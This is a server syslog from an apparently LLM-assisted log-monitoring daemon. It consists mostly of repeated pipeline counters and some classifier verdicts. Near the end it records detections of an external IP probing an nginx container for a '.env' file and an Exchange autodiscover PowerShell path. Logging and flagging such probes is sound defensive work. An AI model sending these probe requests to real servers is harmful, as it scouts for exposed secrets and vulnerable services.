pattern_hits=1512 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:19:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 04:19:01.941837 [observer] Patterns: hash=1512 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:19:31.942896 [observer] Pipeline: processed=1540 pattern_hits=1514 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:19:31.942925 [observer] Patterns: hash=1514 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:20:01.945862 [observer] Pipeline: processed=1542 pattern_hits=1516 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:20:01.945897 [observer] Patterns: hash=1516 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:20:31.936650 [observer] Pipeline: processed=1546 pattern_hits=1520 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:20:31.936677 [observer] Patterns: hash=1520 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:21:01.953509 [observer] Pipeline: processed=1548 pattern_hits=1522 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:21:01.953686 [observer] Patterns: hash=1522 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:21:31.934603 [observer] Pipeline: processed=1552 pattern_hits=1526 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:21:31.934633 [observer] Patterns: hash=1526 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:22:01.956133 [observer] Pipeline: processed=1556 
pattern_hits=1530 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:22:01.956192 [observer] Patterns: hash=1530 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:22:31.934904 [observer] Pipeline: processed=1560 pattern_hits=1534 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:22:31.934933 [observer] Patterns: hash=1534 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:23:01.936410 [observer] Pipeline: processed=1562 pattern_hits=1536 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:23:01.936433 [observer] Patterns: hash=1536 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:23:31.949108 [observer] Pipeline: processed=1564 pattern_hits=1538 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:23:31.949297 [observer] Patterns: hash=1538 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:24:01.940576 [observer] Pipeline: processed=1568 pattern_hits=1542 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:24:01.940609 [observer] Patterns: hash=1542 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:24:31.939199 [observer] Pipeline: processed=1570 pattern_hits=1544 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:24:31.939222 [observer] Patterns: hash=1544 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:25:02 ip-172-26-12-110 observer[1565011]: 
2026/03/20 04:25:02.044944 [observer] Pipeline: processed=1574 pattern_hits=1548 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:25:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:25:02.049448 [observer] Patterns: hash=1548 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:25:31.933618 [observer] Pipeline: processed=1576 pattern_hits=1550 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:25:31.933642 [observer] Patterns: hash=1550 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:26:01.948219 [observer] Pipeline: processed=1580 pattern_hits=1554 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:26:01.948250 [observer] Patterns: hash=1554 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:26:31.943804 [observer] Pipeline: processed=1582 pattern_hits=1556 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:26:31.943831 [observer] Patterns: hash=1556 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:27:01.943593 [observer] Pipeline: processed=1586 pattern_hits=1560 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:27:01.943621 [observer] Patterns: hash=1560 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:27:31.934808 [observer] Pipeline: processed=1590 pattern_hits=1564 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:27:31.934831 [observer] Patterns: hash=1564 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 
misses=26 Mar 20 04:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:28:01.949761 [observer] Pipeline: processed=1592 pattern_hits=1566 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:28:01.949787 [observer] Patterns: hash=1566 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:28:31.933691 [observer] Pipeline: processed=1596 pattern_hits=1570 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:28:31.933715 [observer] Patterns: hash=1570 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:29:01.956945 [observer] Pipeline: processed=1598 pattern_hits=1572 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:29:01.956980 [observer] Patterns: hash=1572 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:29:31.933938 [observer] Pipeline: processed=1602 pattern_hits=1576 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:29:31.934126 [observer] Patterns: hash=1576 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:30:01.956912 [observer] Pipeline: processed=1604 pattern_hits=1578 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:30:01.957447 [observer] Patterns: hash=1578 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:30:31.951952 [observer] Pipeline: processed=1606 pattern_hits=1580 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:30:31.951985 [observer] Patterns: 
hash=1580 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:31:01.942115 [observer] Pipeline: processed=1610 pattern_hits=1584 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:31:01.942143 [observer] Patterns: hash=1584 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:31:31.933656 [observer] Pipeline: processed=1612 pattern_hits=1586 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:31:31.933678 [observer] Patterns: hash=1586 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:01.951793 [observer] Pipeline: processed=1618 pattern_hits=1592 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:01.951832 [observer] Patterns: hash=1592 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:31.946362 [observer] Pipeline: processed=1620 pattern_hits=1594 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:31.946387 [observer] Patterns: hash=1594 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:32:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:46.565427 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix Mar 20 04:32:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:46.565474 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 04:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:33:01.961437 [observer] Pipeline: processed=1625 
pattern_hits=1598 llm_calls=27 llm_errors=0 learned=0 Mar 20 04:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:33:01.961491 [observer] Patterns: hash=1598 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=27 Mar 20 04:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:33:31.934880 [observer] Pipeline: processed=1627 pattern_hits=1600 llm_calls=27 llm_errors=0 learned=0 Mar 20 04:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:33:31.934906 [observer] Patterns: hash=1600 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=27 Mar 20 04:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:01.954712 [observer] Pipeline: processed=1629 pattern_hits=1602 llm_calls=27 llm_errors=0 learned=0 Mar 20 04:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:01.954737 [observer] Patterns: hash=1602 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=27 Mar 20 04:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:31.937278 [observer] Pipeline: processed=1633 pattern_hits=1606 llm_calls=27 llm_errors=0 learned=0 Mar 20 04:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:31.937300 [observer] Patterns: hash=1606 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=27 Mar 20 04:34:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:50.543592 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 04:34:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:50.543637 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 04:35:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:00.255706 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.78 action=allow pattern_type=regex Mar 20 04:35:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:00.255744 [analyzer] Source hint mismatch: LLM says 
"tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 04:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:01.941595 [observer] Pipeline: processed=1638 pattern_hits=1608 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:01.941629 [observer] Patterns: hash=1608 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:35:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:04.842010 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 04:35:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:04.843197 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 04:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:31.934315 [observer] Pipeline: processed=1642 pattern_hits=1612 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:31.934339 [observer] Patterns: hash=1612 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:36:01.944942 [observer] Pipeline: processed=1644 pattern_hits=1614 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:36:01.944969 [observer] Patterns: hash=1614 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:36:31.935201 [observer] Pipeline: processed=1647 pattern_hits=1617 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:36:31.935227 [observer] Patterns: hash=1617 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:37:01.937498 [observer] Pipeline: processed=1650 pattern_hits=1620 
llm_calls=30 llm_errors=0 learned=0 Mar 20 04:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:37:01.937526 [observer] Patterns: hash=1620 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:37:31.944934 [observer] Pipeline: processed=1654 pattern_hits=1624 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:37:31.944964 [observer] Patterns: hash=1624 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:38:01.959536 [observer] Pipeline: processed=1658 pattern_hits=1628 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:38:01.959613 [observer] Patterns: hash=1628 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:38:31.942785 [observer] Pipeline: processed=1660 pattern_hits=1630 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:38:31.942813 [observer] Patterns: hash=1630 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:39:01.943339 [observer] Pipeline: processed=1664 pattern_hits=1634 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:39:01.943391 [observer] Patterns: hash=1634 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:39:31.937678 [observer] Pipeline: processed=1666 pattern_hits=1636 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:39:31.937705 [observer] Patterns: hash=1636 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 
04:40:01.952103 [observer] Pipeline: processed=1669 pattern_hits=1639 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:40:01.953715 [observer] Patterns: hash=1639 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:40:31.934644 [observer] Pipeline: processed=1672 pattern_hits=1642 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:40:31.934675 [observer] Patterns: hash=1642 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:41:01.957555 [observer] Pipeline: processed=1674 pattern_hits=1644 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:41:01.957610 [observer] Patterns: hash=1644 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:41:31.933837 [observer] Pipeline: processed=1678 pattern_hits=1648 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:41:31.933861 [observer] Patterns: hash=1648 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:42:01.944837 [observer] Pipeline: processed=1680 pattern_hits=1650 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:42:01.944999 [observer] Patterns: hash=1650 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:42:31.934629 [observer] Pipeline: processed=1686 pattern_hits=1656 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:42:31.934658 [observer] Patterns: hash=1656 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 
20 04:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:43:01.952713 [observer] Pipeline: processed=1688 pattern_hits=1658 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:43:01.952746 [observer] Patterns: hash=1658 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:43:31.933590 [observer] Pipeline: processed=1691 pattern_hits=1661 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:43:31.933612 [observer] Patterns: hash=1661 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:44:01.953186 [observer] Pipeline: processed=1694 pattern_hits=1664 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:44:01.953217 [observer] Patterns: hash=1664 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:44:31.950709 [observer] Pipeline: processed=1696 pattern_hits=1666 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:44:31.950736 [observer] Patterns: hash=1666 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:45:01.935729 [observer] Pipeline: processed=1700 pattern_hits=1670 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:45:01.935755 [observer] Patterns: hash=1670 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30 Mar 20 04:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:45:31.948770 [observer] Pipeline: processed=1702 pattern_hits=1672 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:45:31.948798 [observer] Patterns: hash=1672 prefix=0 
regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:01.938768 [observer] Pipeline: processed=1706 pattern_hits=1676 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:01.938797 [observer] Patterns: hash=1676 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:46:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:20.198903 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T04:46:20.198599145Z 2026/03/20 04:46:20 [error] 422#422: *745238 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 146.103.1.108, server: _, request: "GE...
Mar 20 04:46:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:20.198973 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T04:46:20.198706223Z 146.103.1.108 - - [20/Mar/2026:04:46:20 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik...
Mar 20 04:46:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:20.678198 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T04:46:20.677883802Z 146.103.1.108 - - [20/Mar/2026:04:46:20 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Ge...
Mar 20 04:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:31.942989 [observer] Pipeline: processed=1711 pattern_hits=1681 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:31.943014 [observer] Patterns: hash=1681 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:47:01.942257 [observer] Pipeline: processed=1714 pattern_hits=1684 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:47:01.942293 [observer] Patterns: hash=1684 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:47:31.941489 [observer] Pipeline: processed=1719 pattern_hits=1689 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:47:31.941511 [observer] Patterns: hash=1689 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:48:01.951946 [observer] Pipeline: processed=1721 pattern_hits=1691 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:48:01.951983 [observer] Patterns: hash=1691 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:48:31.933656 [observer] Pipeline: processed=1725 pattern_hits=1695 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:48:31.933682 [observer] Patterns: hash=1695 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:49:01.951540 [observer] Pipeline: processed=1727 pattern_hits=1697 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:49:01.951569 [observer] Patterns: hash=1697 
prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:49:31.934874 [observer] Pipeline: processed=1731 pattern_hits=1701 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:49:31.934901 [observer] Patterns: hash=1701 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:50:01.941589 [observer] Pipeline: processed=1733 pattern_hits=1703 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:50:01.941621 [observer] Patterns: hash=1703 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:50:31.935419 [observer] Pipeline: processed=1736 pattern_hits=1706 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:50:31.935447 [observer] Patterns: hash=1706 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:51:01.950289 [observer] Pipeline: processed=1739 pattern_hits=1709 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:51:01.950315 [observer] Patterns: hash=1709 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:51:31.935287 [observer] Pipeline: processed=1741 pattern_hits=1711 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:51:31.935309 [observer] Patterns: hash=1711 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:52:01.942260 [observer] Pipeline: processed=1745 pattern_hits=1715 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:52:01 ip-172-26-12-110 observer[1565011]: 
